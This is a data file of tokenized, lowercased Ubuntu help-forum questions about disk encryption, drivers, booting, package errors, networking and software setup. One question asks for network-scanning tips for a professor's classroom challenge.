512254	luks encrypt / with a key stored in /boot	first , i know it sounds a little weird to do this ( putting a key in plaintext on a drive ) , but here 's why i want to do it this way : if i ever want to give the computer/drive to someone else , i want to just be able to remove the key from the luks header and call it good . i 've installed to a normal partition . i then created a /boot partition and an luks partition for / . i used rsync with the avx options to move the files to the encrypted / and the ( unencrypted ) /boot . i mounted /boot and / and did the wiki 's instructions for installing grub with chroot , including update-grub and grub-install /dev/sda . i also set up /etc/crypttab and /etc/fstab with the new settings . in the crypttab , i specified /boot/keys/key1.rand as the key . i also did update-initramfs -k all -u in the chroot . boot this gets me an ( initramfs ) prompt . if i change the key for the / partition to none , and just type the passphrase i also have , it boots . i also know i have the right key syntax , and it can get the key , because i have another disk with a luks encrypted partition that unlocks and automounts on boot on another drive . so what 's so special about / that it ca n't use a keyfile ?
512256	how does sudo ! ! work on ubuntu	i love the idea behind the command : sudo ! ! but it does n't really work on ubuntu ( 14.04 and earlier ) . when i type apt-get install htop it will obviously tells me to run the command as super user . and therefore i should be able to run this : sudo ! ! which would execute the command sudo apt-get install htop but instead it tells me that it could n't find the command sudoapt-get which basically means that it does n't put a space after the sudo keyword . why is that ? am i using the command wrong ? i am very certain that i get the expected behaviour on fedora .
512257	how to install elementary-xfce theme	i am trying to make xubuntu 14.04 to look like elementary os . i have found this repo https : //github.com/shimmerproject/elementary-xfce , but have no idea how to actually apply this theme to my system . best regards
512260	sorry , ubuntu 12.04 has experienced an internal error /usr/bin/xorg	how do i fix this my screen keeps flashing . my dvd drive wont work and neither will my wifi devices that are hooked up . how do i fix this i heard of a few other ways but they all require a sudo pw . i do not have is there any way to fix this can you please help me ?
512262	ubuntu 12.04 libreoffice update breaks software updating	after applying the latest updates today ( august 16 , 2014 ) , libreoffice-base will not complete the upgrade due `` no diversion '' error which then seems to break the postrm script and now i can neither update , install or remove packages . i have turned off all ppa repositories , performed `` sudo dpkg -- configure -a '' , `` sudo apt-get autoremove '' as well as `` sudo rm -fr /var/cache/apt '' to create a clean slate - but to no avail . i have also tried renaming the offending files to .bak . any ideas ? output of latest attempt : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : iw crda wireless-crda wireless-regdb use 'apt-get autoremove ' to remove them . the following packages will be removed : libreoffice-base 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 6,748 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 221883 files and directories currently installed . ) removing libreoffice-base ... no diversion 'diversion of /usr/lib/libreoffice/share/basic/dialog.xlc to /usr/lib/libreoffice/share/basic/dialog.xlc.noaccess by libreoffice-base ' , none removed . no diversion 'diversion of /usr/lib/libreoffice/share/basic/script.xlc to /usr/lib/libreoffice/share/basic/script.xlc.noaccess by libreoffice-base ' , none removed . /var/lib/dpkg/info/libreoffice-base.postrm : 31 : /var/lib/dpkg/info/libreoffice-base.postrm : syntax error : end of file unexpected ( expecting `` fi '' ) dpkg : error processing libreoffice-base ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : libreoffice-base e : sub-process /usr/bin/dpkg returned an error code ( 1 )
512265	growing partition ubuntu	at 1st , i had a windows machine . i thought ubuntu sounded neat to dual boot with , and so it was . now i want to put more than 60 gb towards ubuntu . more like 200 gb . is there any way i can do that now that i have system data and all on there already ? in windows i have lots of free space to put more towards ubuntu . ( like 300 gb )
512266	how to backup user preferences and packages list to be loaded on different machine / after format ?	i 'd like to install ubuntu on my other computer , but first minimize work needed to recreate my current ubuntu configuration , including packages and their settings ( like apache2 , mysql or wallch ) . can i do anything ? is there related backup or clone ubuntu function available ? the best would be iso image at the end of process or one big self-extracting archive that also installs packages . for now i 've just found hidden file containing all processed terminal commands , big but eventually quite useful .
512269	x1 carbon functions keys does not work in gnome 3	i have ubuntu 14.04 gnome edition on my 2nd gen thinkpad x1 carbon , and the function key does not work on switching different modes ( its the f keys all the time ) . i have read about that problem and fixes regarding updating kernel and firmware , and it still does not work , and i have given up until this point . then i accidentally touched the function keys while booting ( before x started ) and the the keys does change modes ( changed to the one with volume control etc . ) and i was unable to get the f keys back while inside of gnome . that suggests that its the window system that is somehow limiting the normal use of the adaptive keys . any ideas on where should i start looking ( which logs etc ) and what can i do to fix it ? thanks !
512270	intel corporation ethernet connection does not start properly	i 'm experiencing some problems when trying to connect my pc to the router through a switch . when the pc is directly connected to the router , everything works fine , ubuntu ( 14.04 ) starts normally , and the internet connection runs inmediately . the ethernet controller is the intel corporation ethernet connection , as lspci returns : $ lspci | grep eth 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 04 ) however , when i try to connect through the switch what i get is the following . dmesg returns : $ dmesg | grep eth [ 1.035585 ] e1000e 0000:00:19.0 eth0 : registered phc clock [ 1.035587 ] e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) 00:22:4d : a7 : be:5d [ 1.035589 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 1.035625 ] e1000e 0000:00:19.0 eth0 : mac : 11 , phy : 12 , pba no : ffffff-0ff [ 1.357838 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 2.165413 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 2.165574 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 2.641287 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 16.715086 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx [ 16.715090 ] e1000e 0000:00:19.0 eth0 : 10/100 speed : disabling tso [ 16.715117 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready it looks like eth0 is properly working . actually , nm-tool returns : $ nm-tool - device : eth0 [ conexi贸n cableada ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : connected default : yes hw address : 00:22:4d : a7 : be:5d capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.30 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 80.58.61.250 dns : 80.58.61.254 dns : 192.168.1.1 however , ping returns : $ ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . from 192.168.1.30 icmp_seq=1 destination host unreachable from 192.168.1.30 icmp_seq=2 destination host unreachable from 192.168.1.30 icmp_seq=3 destination host unreachable the connection is restored by restarting it : # ifconfig eth0 down # ifconfig eth0 up from this point on , everything runs smoothly , as if the pc were directly connected to the router . it seems to be an issue related to the integrated lan adaptor and the ethernet controller , since my laptop connects without any problem . my desktop board is an intel db85fl . i 'd be grateful if anyone could give some ideas on how to solve this issue . thank you in advance .
512271	ubuntu ssh clients	is there a ssh client similar than filezilla but i all so need to use terminal sometimes . support for ssh access key is all so requirement . it would be great if i just could jump up and down files in graphical view and when needed just popup window and use terminal commands in my server . can i for example use nautilus and terminal ? or does ssh access key mix things up ? i mean when access key is saved , does both programs how to use access key ? edit : i try to make my question more clear . : ) i 'm building my very first server setup but i have n't been able to get server on line , just checking how things should work .
512273	ubuntu 14.04 lts hd 7750 amd drivers freeze	i had some problem with my graphic on pc . my configuration : amd fx 6100 16gb ram samsung evo 120gb radeon hd 7750 i use 42 '' toshiba tv for screen and this might be a problem i think . connected via hdmi . when i use proprietary drivers from amd website everything works fine until my screen freeze and cant do anything . trying lastest beta driver and stable , the same effect . on open source driver freezes didnt appear but on my tv i cant see unity bar and indicators/time bar . thanks for any advice .
512274	boot ubuntu with latest kernel version	my ubuntu 14.04 updated with latest kernel version ( 3.13.0-34-generic ) but when i type uname -a it gives me this output : linux kasiya-pc 3.13.0-33-generic # 58-ubuntu smp tue jul 29 16:45:05 utc 2014 x86_64 x86_64 x86_64 gnu/linux that means it is booted with old kernel ( 3.13.0-33-generic ) . then how to tell ubuntu ( possible with editing grub ) to boot with latest kernel , after update to new kernel ?
512276	disable automatic vertical maximise of windows when scaled to bottom of screen	i have the following problem : when scaling a window to the bottom of the screen , it gets automatically maximised vertically . this is very annoying as i want to decide how to scale my windows ! i found no option that triggers this . the compiz plugin grid is disabled . everything i find when searching for my problem , are references to grid ... my system : ubuntu 14.04.1 lts kernel 3.13.0-32-generic compiz 0.9.11.2 gnome 3.8+4ubuntu3 using gnome fallback mode
512280	ubuntu 14.04 strange things happening	so i have some kind of problem with my ubuntu 14.04 64 bit . file mannager keeps crashing and some of the apps has a different layout for example system monitor looks weird : file explorer does the same thing occasionally , what is happening and how to resolve it ? here is another img :
512283	permission denied on perl script - apache	i have fresh installed ubuntu server 14 . after all configuration i 'm trying to run my intranet but i have problem and i 've tried all ( to me ) known solutions apache have no permission to execute my script . the script is ok - its been running years and its working perfect from commandline . the same website / intranet is working fine on another machine ( ubuntu 13 ) which i 'm planning to upgrade php scripts working ok i found exactly the same problem here ( where i 've added my 'answer ' - > question / extended the main question but its been deleted - so im asking new one ) fstab is ok ( which solved my problem over year ago ) /mnt/disk ext4 defaults , exec , user , rw 0 0 permissions are ok subfolders : 775 , file : 775 ( user : www-data , group : www-data ) /etc/apache2/sites-enabled/000-default.conf < directory /mnt/disk/webz > options execcgi followsymlinks multiviews addhandler cgi-script .cgi .pl allowoverride all order allow , deny allow from all require all granted < /directory > and still getting error [ cgi : error ] [ pid 2008 ] [ client xxx.xxx.xxx.xxx:1058 ] ah01215 : ( 13 ) permission denied : exec of '/mnt/disk/webz/index.cgi ' failed any help ?
512285	not enough room on hd to load ubuntu along xp , how to transfer files	i 'm very new to linux and ubuntu and i 'm wanting to permanently load ubuntu instead of xp . i dont have enough room on my hard drive to load both to run side by side . so i am loading ubuntu via usb stick . i want to transfer my files ( pictures , music , documents etc . ) from xp to ubuntu . what is the easiest way to do that ? also i can not watch some videos on firefox . i can watch youtube videos but on some other sites with different file formats that will not load . thanks for any and all suggestions
512286	problem with installing ubuntu 14.04.1 lts trusty tahr	ubuntu 12.04 lts was installed , functioning well . i just installed the new trusty tahr version . restarting the laptop the message below appeared . how to solve ? mount : mounting /dev/loop0 on root/failed : invalid argument mount : mounting /dev on root/dev failed : no such file or directory mount : mounting /sys on root/sys failed : no such file or directory mount : mounting /proc on root/proc failed : no such file or directory target file system does n't have requested /sbin/init no init found . try passing init= bootarg busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for list of build-in commands ( initramfs )
512288	`` close nautilus and open terminal in the same directory '' ?	is there a way to do this ? whether by a keyboard shortcut or a context menu item or something ? note : i specifically mean `` close nautilus '' -- this works for opening a terminal without closing nautilus .
512289	searching for java path	i 'm trying to install predictionio using terminal . at a point of the install process , it wants to download hadoop and for this , it asks for the java path . i 'm trying to find this path and until now , i was unable to input a path that it accepts to install hadoop . these are the path that i 've found : /usr/lib/jvm/java-1.7.0-openjdk-amd64/java /usr/lib/jvm/java-1.6.0-openjdk-amd64/java how can i find the java path ?
512290	trying to upgrade from 12.10 to 14.04 and not having any luck ... 404 error occurs	this is a long winded question so bear with me ! i am trying to upgrade my 12.10 quental ubuntu to the 14.04 version . this has led to a problem within my system not being able to update . for information , this build of ubuntu does a dual-boot with my windows 7 package . i initially tried to find the update manager on my system which has dissapeared . i then searched on google and came to this page : how to upgrade from ubuntu 12.10 to 14.04 when typing in sudo apt-get update , it hits 18 % and says , `` waiting for headers . '' a couple of errors occur . the last two lines of the error log state : '' w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/raring/multiverse/binary-amd64/packages 404 not found [ ip : 91.189.91.13 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . '' i have checked online and found this page in answer to this problem : how can i fix a 404 error when updating packages ? during the main answer it suggests to type these three lines into the command line : sudo add-apt-repository ppa : fossfreedom/packagefixes sudo apt-get update sudo apt-get install banish404 after i run sudo banish404 , i still get the same error message . my final aim is to just update ubuntu to 14.04 in my dual boot machine . my fear is if i download an iso and try to run it from booting my machine , it will either wipe everything , ( and there is a lot of stuff within my windows account ! ) or provide a triple boot scenario whereby i choose between windows , ubuntu 12.10 and ubuntu 14.04 . my experience is very limited with linux and the command line , ( did a short course a couple of years ago with my uni . ) although it has increased a lot in the last two days , ( i have created to a kali linux virtual machine and a sift forensics virtual machine , both in virtual box on my windows account . ) any help ?
512292	ubuntu 14.04 minimize window suspending deskop	when i try minimize window i ca n't do nothing until i switch to another desktop ( using keyboard shortcut ) . i using sidekick effect but it 's also happens when i do n't have any effect . what is strange this issue appears only for last window on desktop . if i have 3 windows first two i can minimize without problems but last one always causes suspending . log from glxinfo : opengl vendor string : nvidia corporation opengl renderer string : geforce gt 220/pcie/sse2 opengl core profile version string : 3.3.0 nvidia 331.38 opengl core profile shading language version string : 3.30 nvidia via cg compiler opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.3.0 nvidia 331.38 opengl shading language version string : 3.30 nvidia via cg compiler opengl context flags : ( none ) opengl profile mask : ( none ) opengl extensions : thanks in advance . regards .
512293	webcamera is not working on chatroulette	my webcam is not working on chatroulette and i do n't know where to access it from '' system setting '' what can i do to make it work even tho it 's allowed on the navigator
512298	synaptics touchpad not working in ubuntu 14.04 lts	im using an hp 15-d017cl notebook pc and after installing ubuntu 14.04 lts , my touchpad stopped working . it works in windows 8.1 , but in ubuntu , it has never worked since the start . after going through terminal and using the sudo apt-get command for the xorg synaptics driver , it still didnt work . when i go to terminal and use the synclient command , it reports back that the synaptics driver is not loaded . please help , i dont want to keep having to use a usb mouse .
512301	ipod touch 2g not mounting on ubuntu 14.04	when i connect & try to mount ipod nautilus shows `` unable to access ipod touch . unable to connect '' . what can i do ?
512302	install ubuntu and share folder with windows 8	my wife just bought a laptop with window $ 8 preinstalled on it . for her studies she needs windows but she wants ubuntu as well because win 8 sucks . how can i install ubuntu in dual boot and share a partition between the two os so she can have access of all her stuff in either os ? thanks for your help guys !
512306	live host on network is masked in some way or its changing it 's ip ?	overview : my professor runs some kind of live ubuntu os image on top of the classroom computer he uses to lecture then portals into his linux box located in his office . he has informed me his hostname and the os he is running on his box which is ubuntu . somehow he has hardened his box through some nsa documentation . his ip address changes or is masked in some way as he has hinted . he has challenged me to leave a message on his computer . therefore , my tasks consist of finding his ip from the hostname he gave me , scan for open ports and figure which port he uses . he has informed me there is no password for the very reason of this challenge he gave me . environment variables : hostname : epiphyte-ix network : there are three networks at our school . the administrative network , student network , experimental network . he is connected to the administrative network which , as being an it student employee , i have access too . my computer : running kali linux trouble i 'm having he has hinted that his computer changes it 's ip address once `` something '' expires . what exactly expires i do n't know . i 'm guessing it 's some kind of dhcp service running on whatever port he is using . if i ask anything else he just chuckles and says he is still waiting for a message . i 'm getting permission from my it boss to nmap the whole admin network from my kali system . i 've tried a few commands already in looking up the hostname but not having any luck . right now i 'm putting a list of nmap commands and additional scans i could possibly do but since his ip address is changing i would like guidance . i would like some direction from you guys before i go on some ridiculous web search . i really have no idea where to start as i 'm an electrical engineering student not a informations security or networking student . i do have a basic grasp on networking and i 'm fairly efficient from the command line . want i 'm hoping to get from this post : namp parameters that might hold a high potential in detecting his computer other reconnaissance tactics to gain more information on his ip address and system additional directions that you might suggest i take in conclusion : thanks for any help/advice you might have for me . i may of posted a similar discussion on this topic here but can not recall if i did . therefore , if i did i apologize and did so in creating a better in detail description of my tasks and environment variables . note : i may of misused a few words and phrases as i 'm not a genius in networking vocabulary . these may be the following ... 1 . ) `` runs some kind of live ubuntu os image on top of the classroom computer '' i know for a fact he plugs in a hard drive of some kind and then portals into his linux box so i 'm guessing this is some kind of live iso image . i did my homework and researched his hostname `` epiphyte-ix '' . epiphyte is a plant that lives/grows on another plant so i 'm guessing this applies as i hinted it to him and he replied `` very good '' . 2 . ) `` his ip addresss changes or is masked '' i asked if he hidden the linux box from the network in someway and he said `` its hard to detect '' . he also informed me that his ip changes the minute something expires .
512308	ntfs mount problem	i was unable to mount two of the partitions mainly due to fast boot up feature of windows 8 , but by mistake without checking the mounted partitions , i removed windows via os- unistaller . now can not mount my two partitions.. so what should be done to recover my partitions .
512310	minecraft crashes after a few minutes , freezes computer	i have ubuntu 14.04 , 64-bit . after playing minecraft for a few minutes , the game freezes and my whole computer stops responding . this also happens in gmod . i tried different graphics drivers , the same thing happens . how can i stop these crashes from happening ?
512314	installing ubuntu onto a netbook and a pc	i recently installed ubuntu 14.04 onto an acer aspire one happy using a bootable usb stick and it works . so i tried to install using the same medium onto my pc and acer aspire m1800 but i get a message `` unable to locate a medium with a live file system '' ? and a load of other information what gives ? both computers use windows 7 the netbook had a magor cock up and ubuntu saved the day ( sort of ) this also happens when i use a cd i can not figure out what is going on
512315	gnupg installed from source causing issue with seahorse and gpa	i have installed gnupg version 1.4.18 by building from source , so it got installed to /usr/local/bin . that causes issues with seahorse as well as gpa because they keep looking for the application in /usr/bin . i see no way of changing gpg path from within seahorse or gpa , so how do i fix this issue ? thanks .
512316	rhythmbox problem when resuming podcast playback	i use rhythmbox to manage and download my music podcasts . the problem here is when i 'm listening a episode and i have to pause it , then i can not resume the playback anymore . play/pause button or shortcuts do n't work . currently i end up seeing the time at the progress bar , resume the playback from the beginning ( double click on the episode ) and then seek forward to the previous playback time . anyone got this problem ? ubuntu 14.04 x64 rhythmbox 3.0.2
512317	how to make use of homestead/laravel dev environment on ubuntu ?	basically , i 'm trying to create a vagrant box on ubuntu for development of laravel web applications . i 've done this on windows , os x and now i 'm trying to use my ubuntu laptop for this . i setup virtualbox and installed vagrant no problem but the laravel documentation calls for this vagrant command : vagrant box add laravel/homestead instead of properly setting up a box - as it does in windows and os x - i get an error : this command was not invoked properly . the help for this command is available below . usage : vagrant box add < name > < url > [ -- provider provider ] [ -h ] -- checksum value checksum -- checksum-type value checksum type -c , -- clean remove old temporary download if it exists . -f , -- force overwrite an existing box if it exists . -- insecure if set , ssl certs will not be validated . -- cacert certfile ca certificate -- cert certfile the client ssl cert -- provider provider the provider that backs the box . -h , -- help print this help what is different between ubuntu and my other systems where i have had no problem ? please note : i do not wish to install a web stack directly onto my desktop which is why i have chosen to isolate them to virtual machines . laravel tutorial : http : //laravel.com/docs/homestead
512319	how to restore system after losing control on x , probably because of second screen ?	i broke my ubuntu 14.04 polish version , and have no idea , how to get it back without reinstaling it . how my ubuntu looks like right now when i start ubuntu i got only desktop with folders on it without unity `` shell '' , no top or launch bar . my mouse pointer is dis and re appearing in about half second intervals . at the beginning there is error message , something is not working in your system , and it 's sort of `` re-scaling '' , for a while it 's a little bigger , than again smaller . when i click some folder to open it , there is a window , but i think it 's not nautilus . it has no top bar , i ca n't choose any option , anything . this window also `` re-scaling '' a little , especial top bar is sometimes wider . it made impression on me , that all this things , flashing pointer , re-scaling windows , have same intervals . there is information , that i 'm not wifi connected , and when i click on wifi i see no wifi available . super+tab does n't work . i do n't know how to open terminator ( or any other terminal i got ) . super dooes n't make dash appear . ctrl+alt+arrows has no effect ( i had workspaces enabled ... many workspaces ) . alt+f4 does n't work with window , does n't work without window ( it do n't shut down window nor system ) . ctrlsupertoparrow does n't work on window . how i did it i 'm not sure . it started when i was trying to watch some online film on tvscreen by plugging it in via hdmi cable . for a while it worked , i watched first 30-50 s of film but then on tv screen i saw some other application ( i think i had it open already , some ubuntu video , but not running ) and nothing else , i could hear online video in background still running . than i saw only my desktop and after a while , when i could n't do anything , i forced power off . you know what i saw after turning ubuntu on . so , rescaling windows and flashing pointer suggest , that it 's a reason . but maybe there is another one , or multiple reasons , because : while i was doing my experiments with tvscreen ( first time did something like this ) in the background there were running terminal with big update . i think it had not ended before my power off . it was n't clean update , i let in some not authorized packets update too . i 've got `` polish '' version of system , sort of `` remix '' of original ubuntu 14.04 lts , with some programs already built in at the instalation : triumfalna turkawka . some of not authorized updates was from there ... or at least i was sure about this at the beggining . and i did n't check names of all unauthorized packages . but there were more . i was running big `` lets get all suitable programs from manager center '' . i installed 10-15 new accessories and did n't reboot before crash . and computer was already running for about a day , with some adobe flash opened in the background ( left laptop for night checking some bash script interacting with flash by simple clicking ) , so maybe he just had enough ? and for more , this remix was already installed on ubuntu 12.04 with option do n't format , i want my files and programs from old system . but ... my i had totally broken my 12.04 by running command apt-get remove phyton2.7 or something like that , and it removed something more than python ( actually almost everything , i still do n't understand why ) . so maybe 14.04 already used some broke dependencies ? what i already tried running in failsafex graphic mode . i saw black screen for 5-10 minutes before logging screen ( after choosing option , failsafex for one session ) starting ubuntu from ... i actually dont know , something what had `` generick mode '' in name . so i tried the one behind the main one . same problems as after just running in normal mode ( flashing pointer , rescaling windows , no unity , no wifi ) but after alt+f4 i was in commandline ! so it was something , i could do something , backup , run some checks ... i did n't know how , so i did n't do it , but i already could ! it was something ! some advice ? i would be happy , if it would be possible to restore system without reinstaling it . but you see how much it already have been broken . so probably sooner or later i will try to do some backup and try to reinstall with format . still , backup would be much easier with system running . i 'm starting to really depend on ubuntu , and want to learn some more . i want to know - what should i do now ? what check ? what diagnose tool run ? even if restoring normal graphic is not possible , how can i make it somehow work , for good backup ? how can i open terminal ? command line ? and in the end , what should i backup for fast and full reinstallation , with all files later back and list of programs and configurations i use ... but i guess i will find answer for this in other questions . thanks for any help , advice , information , or anything what will make me know more about this system . p.s . i was sure i sign in a few weeks ago , but when i log in using google , i 'm here as user3895596 , when i was using stack exchange i accidentally posted question there . so it looks like i sign up on stack overflow whatever it is , how can i log in with this and ask here ... hmmm , i 'm not sure if i 'm clear about my login problem , i messed up something .
512321	how do i get my internal hdd to mount at startup ?	it 's either not intuitive or not working in ubuntu 14.04 . i want to mount my internal hdd at at startup ( i boot from an ssd ) . i attempt to set this , following this procedure : open disks utility select the disk below the disk 's volumes , click on the more actions button select edit mount options ... select automatic mount options `` off '' under mount options , ensure that mount at startup is selected click ok enter password into authenticate dialog box restart but this procedure does n't work . upon rebooting , and after grub attempts to start ubuntu , i receive the error message `` an error occurred while mounting /mnt/4f721fc0-8072-453f-b48f-ca686bd89549 . press s to skip mounting or m for manual recovery '' . that identifier `` 4f721fc0-8072-453f-b48f-ca686bd89549 '' was automatically assigned by ubuntu . i press s and the boot process continues ok . if i try to mount the disk immediately after booting , i receive the error message `` unable to access `` storage '' '' ( i named the volume storage ) . so then i start the disks utility and set it to automatic mount options `` on '' and reboot . to me , it seems like this should work , but it does n't . here are a number of photos of the process ( alt+prtscn does n't work after selecting more actions ) .
512322	nginx configure : error : no [ my add modds ] /config was found	nweb here on ask-ubuntu i have been trying to compile nginx from source on ubuntu 14.04 x64 and i get the following error : ./configure : error : no /src/mods/ [ my add modds ] /config was found if i remove the line in question fron the ./configure command , i just get the same error but for the next -- add-modual in the list . i.e . ./configure : error : no /src/mods/naxsi-0.53-2/naxsi_src/config was found i checked to see if the files exist , which they do . so , i can not figure out what i have wrong : p any help would be greatly appreciated . below is how i am compiling nginx : # check for updates first thing : sudo apt-get update # insnginx -vtall the various prerequisites needed to compile nginx : sudo apt-get install build-essential lsb-base zlib1g-dev libpcre3 libpcre3-dev libbz2-dev libssl-dev tar unzip openssl # create system users [ if it does n't exist ] : sudo adduser -- system -- no-create-home -- disabled-login -- disabled-password -- group www-data # create a directory root directory named 'sr'c and download the nginx files there : sudo mkdir ~/src/ cd ~/src/ # nginx sudo wget http : //nginx.org/download/nginx-1.7.4.tar.gz sudo tar -xvzf nginx* # lets put the modual source file ( s ) here : sudo mkdir ~/src/mods/ cd ~/src/mods/ # google pagespeed : sudo wget https : //github.com/pagespeed/ngx_pagespeed/archive/release-1.8.31.4-beta.zip sudo unzip release-1.8.31.4-beta.zip # cd into the pagespeed directory and add the psol files in there : cd ngx_pagespeed-release-1.8.31.4-beta/ sudo wget https : //dl.google.com/dl/page-speed/psol/1.8.31.4.tar.gz sudo tar -xzvf 1.8.31.4.tar.gz # do n't forget to cd back to the 'mods ' folder : cd ~/src/mods/ # and the naxsi module : sudo wget https : //github.com/nbs-system/naxsi/archive/0.53-2.tar.gz sudo tar -xvzf 0.53-2.tar.gz # cd to the uncompresses nginx directory cd ~/src/nginx* # run a .configure command : ./configure \ -- add-module=/src/mods/naxsi-0.53-2/naxsi_src \ -- prefix=/etc/nginx \ -- conf-path=/etc/nginx/nginx.conf \ -- error-log-path=/var/log/nginx/error.log \ -- user=www-data \ -- group=www-data \ -- http-client-body-temp-path=/var/lib/nginx/body \ -- http-fastcgi-temp-path=/var/lib/nginx/fastcgi \ -- http-log-path=/var/log/nginx/access.log \ -- http-proxy-temp-path=/var/lib/nginx/proxy \ -- http-scgi-temp-path=/var/lib/nginx/scgi \ -- http-uwsgi-temp-path=/var/lib/nginx/uwsgi \ -- lock-path=/var/lock/nginx.lock \ -- pid-path=/run/nginx.pid \ -- with-pcre-jit \ -- with-debug \ -- with-http_addition_module \ -- with-http_dav_module \ -- with-http_geoip_module \ -- with-http_gzip_static_module \ -- with-http_image_filter_module \ -- with-http_realip_module \ -- with-http_stub_status_module \ -- with-http_ssl_module \ -- with-http_sub_module \ -- with-http_xslt_module \ -- with-ipv6 \ -- with-http_spdy_module \ -- add-module=/src/mods/ngx_pagespeed-release-1.8.31.4-beta
512323	ubuntu 14.04 installer freezes at 33 %	i 've been trying to install linux on my laptop for the whole day but the installer either freezes or gives errno 5 . i have an hp laptop which had windows 8.1 before i accidentally formatted . now i cant even revert it back to windows because i never did any backup . any help appreciated . also i dont know how to get details on the system and currently only have internet access on my ipad .
512325	most shortcut keys in lubuntu does not work	i remember i can use alt+f2 to open the run application and execute a command . but recently , this shortcut does not work any more . but some other keys like ctrl+alt+t can still open a terminal for me . i checked my ~/.config/openbox/lubuntu-rc.xml file , and all the key combinations are set correctly . but only a few of them works .
512326	peerguardian blocks my wifi ip !	iâve tried every thing even the peerguardian wiki ! what i get it that when it tells me to restart pgl after adding the extra ip addresses the restart fails ! when i `` start '' peerguardian is gives me an error saying that the file the wiki told to edit that would fix the ip block then causes both the restart to fail and peerguardian ! ! why is this happening and how can i fix it ?
512327	how to easy share files over a private network , between different os 's	i 'm trying to finding a simple method for sharing my files on my home network . instead of the usual network protocols , which often give me some trouble , i was thinking to something like a local `` dropbox '' or maybe a small web server like nginx with ad-hoc pages that supports drag and drop . any ideas ? i find owncloud.org , other suggestions ?
512330	syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al	this what is happening , i downloaded ( ubuntu-gnome-14.04.1-desktop ) and ( elementaryos-unstable-amd64.20140810 ) to try out in my laptop and i have use ( unetbootin-windows-608 ) and ( universal-usb-installer-1.9.5.5 ) but i get this message every time i try to boot from the usb ( syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al ) however i tried in an old desktop that i have and it works although the installer gets stuck on most of the time at the part of reading partitions/hard drives so please i really need help with this . note : i did installed os x long time ago and i broke windows installation then fix it following some online tutorials just for fyi thanks please can somebody help to fix this problem , i have been looking on google but have n't found anything in concrete . please help
512332	accessing windows shares of a passwordless user using samba	i have a laptop running windows 7 . only one account is configured on it , and it does not have a a password . i try to access its shares from a pc running ubuntu 14.04 , configured to be in the same workgroup , and attached to the same local network . both nautilus and smbclient are unable to access it . for example $ smbclient // < server > / < share > -u < user > enter < user > 's password : anonymous login successful domain= [ workgroup ] os= [ windows 7 ultimate 7601 service pack 1 ] server= [ windows 7 ultimate 6.1 ] tree connect failed : nt_status_access_denied ( i just press enter when asked for a password ) . the irony is that , when the account on the windows laptop is configured to have a password , and the correct password is entered , the connection works . in theory , it should work in both cases : if there 's no password , and no password is entered , there should be no reason to deny access . so , why does n't it work ? does samba consider `` empty password '' as a special case ?
512335	installed ubuntu , windows 8 not in boot menu	i can not access windows 8 , but the files are all there . it just does not appear in the boot menu . i tried to dual boot . i did not use the run along side windows 8 when installing , i used `` something else '' , and created a swap partition , and a partition for root . according to a youtube video , that was the way to dual boot them , but now , windows 8 does not appear .
512338	empty trash securely on ubuntu 14.04	on os x , you can empty your trash securely , how would one do that in ubuntu desktop 14.04 , or is n't it needed ? thank you in advance !
512339	how can i clear wrong typed wireless information ?	i try to connect to a wpa2 wireless network detected by my wireless adapter and the default application for wireless connection under ubuntu 12.04 . i typed some wrong information such as i should have chosen peap , but i chose a different one , and i did n't specify the ca certificate . now the ubuntu application for wireless connection remembers my wrong typed information . i try to edit the information of the wireless network , by clicking `` edit connections ... '' , but that wireless network does n't show , which i guess is because i have n't connected to it successfully . i ca n't add it either , because i do n't know how to find out its ssid , mode , bssid , device and clone mac addresses , mtu , and other information so i wonder how i can connect to the wireless network , and edit the information of the wireless network ? thanks !
512342	trouble downloading adobe reader in xubuntu 14.04	i been trying to install adobe reader from synaptic package manager but i keep getting a error message . are any of you experiencing the same error or bug ? i even tried downloading it from the terminal but no dice ! what do you guys think it could be ? the website is no help since linux is not listed as one of the os to download , what 's up with that ?
512347	ca n't access my computer or log in	i am a complete newbie to ubuntu . a man that fixed my computer said he thought it would work well for me , so i just went for it . that , on top of not understanding computers that well , i 'm pretty lost . anyway , a couple nights ago , it popped up that it needed to update to the new version . it had been reminding me for a while , but i had ignored it . that night i let it update and left it open until it was done . it said it was incomplete , so i just closed it . i then restarted it because it was slow , and that 's when my problem started . what happens is , it starts up on a black screen with : kvm : disabled by bios written out twice . then it goes to my homescreen , but when i put in my password , it like , freezes . it never goes to the browsers , the downloads , anything . and everything is out of place . normally , when you click on the little gear thingy in the corner , it brings up all of the users and settings , but now it only gives me the option to restart , suspend , or shut down . i tried a guest session , other users , but nothing . it just stays on that page with unbuntu 13.10 in the corner , which , if i 'm not mistaken , was the version it was trying to upgrade up from . i 'm sorry if this is really hard to understand ! i 'm trying to explain it as best i can . i really need it working again . i have some art commissions saved only on this laptop , and i ca n't lose them . if you can help me , i would really appreciate it ! ! thanks !
